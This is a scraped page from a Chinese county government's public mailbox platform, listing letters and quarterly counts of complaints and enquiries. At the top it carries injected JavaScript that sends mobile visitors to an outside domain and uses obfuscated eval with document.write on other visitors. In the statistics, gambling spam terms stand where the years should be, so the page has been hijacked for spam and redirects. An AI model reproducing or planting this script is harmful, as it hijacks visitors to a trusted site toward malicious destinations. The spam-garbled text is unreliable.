function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();
部门入口
部门
县市区入口
市 级: 
县(市、区):

郴州市统一互动交流平台

序号 信件标题 信件类型 处理单位
1 投诉 嘉禾县政府
2 咨询 嘉禾县政府
3 投诉 嘉禾县政府
4 咨询 嘉禾县政府
5 咨询 嘉禾县政府
6 咨询 嘉禾县政府
7 投诉 嘉禾县工商局
8 咨询 嘉禾县公安局

极速赛车app极速赛车4季度,县长信箱共收到公众来信24件,其中有效信件24件,已处理24件。有效信件中,投诉信15件,建议类信件2件转市信访局办理,咨询类信件7件转有关部门办理。

2020-01-01

极速赛车3季度,县长信箱共收到公众来信27件,其中有效信件27件,已处理27件。有效信件中,投诉信17件,建议类信件3件转市信访局办理,咨询类信件7件转有关部门办理。

2019-10-01

极速赛车2季度,县长信箱共收到公众来信29件,其中有效信件29件,已处理29件。有效信件中,投诉信22件,建议类信件3件转市信访局办理,咨询类信件4件转有关部门办理。

2019-07-01

极速赛车app极速赛车1季度,县长信箱共收到公众来信15件,其中有效信件15件,已处理15件。有效信件中,投诉信11件,建议类信件2件转市信访局办理,咨询类信件2件转有关部门办理。

2019-04-01
  • 1

    开始时间:2019-10-31  结束时间:2019-11-15

    已过期
  • 2

    开始时间:2019-10-31  结束时间:2019-11-07

    已过期
  • 3

    开始时间:2019-10-31  结束时间:2019-11-08

    已过期
  • 4

    开始时间:2019-09-24  结束时间:2019-09-30

    已过期
  • 5

    开始时间:2019-09-24  结束时间:2019-10-25

    已过期
  • 6

    开始时间:2019-09-24  结束时间:2019-10-29

    已过期